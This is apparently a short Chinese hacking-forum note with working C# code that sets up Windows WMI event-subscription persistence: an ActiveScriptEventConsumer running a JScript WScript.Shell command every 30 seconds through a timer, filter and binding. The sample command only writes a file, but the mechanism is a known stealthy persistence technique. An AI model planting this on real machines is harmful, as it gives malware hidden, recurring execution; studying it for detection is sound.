• binding綁定一個(gè)consumer與filter
• 一個(gè)filter綁定一個(gè)timer
• 一個(gè)consumer保存代碼執(zhí)行體
• timer決定代碼觸發(fā)時(shí)機(jī)

C#代碼如下

// 創(chuàng)建consumer
var obj = new ManagementClass(@"ROOT\subscription:ActiveScriptEventConsumer").CreateInstance();
obj.SetPropertyValue("Name", "Script_Created_by_Csharp");
obj.SetPropertyValue("ScriptingEngine", "JScript");
// JScript代碼執(zhí)行體如下
obj.SetPropertyValue("ScriptText", "var shell=new ActiveXObject(\"WScript.Shell\");shell.Run(\"cmd /c echo ddd>C:\\\\1.txt\")");
var consumerPath = obj.Put();

// 創(chuàng)建timer
var timer = new ManagementClass(@"ROOT\subscription:__IntervalTimerInstruction").CreateInstance();
timer.SetPropertyValue("TimerId", "tm1");
timer.SetPropertyValue("IntervalBetweenEvents", 30000);
timer.SetPropertyValue("SkipIfPassed", false);
var timerPath = timer.Put();

// 創(chuàng)建filter
var filter = new ManagementClass(@"ROOT\subscription:__EventFilter").CreateInstance();
filter.SetPropertyValue("Name", "ft1");
filter.SetPropertyValue("Query", "select * from __timerEvent where TimerId='tm1'");
filter.SetPropertyValue("QueryLanguage", "WQL");
var filterPath = filter.Put();

// 創(chuàng)建binding
var binding = new ManagementClass(@"ROOT\subscription:__FilterToConsumerBinding").CreateInstance();
binding.SetPropertyValue("Consumer", consumerPath.Path);
binding.SetPropertyValue("Filter", filterPath.Path);
var bindingPath = binding.Put();

執(zhí)行時(shí)由服務(wù)DCOMLAUNCH（svchost.exe）啟動(dòng) scrcons.exe 進(jìn)程執(zhí)行腳本，每次執(zhí)行完畢后 scrcons.exe 進(jìn)程退出

[http://bbs.myhack58.com/read.php?tid-185642-uid-1515.html]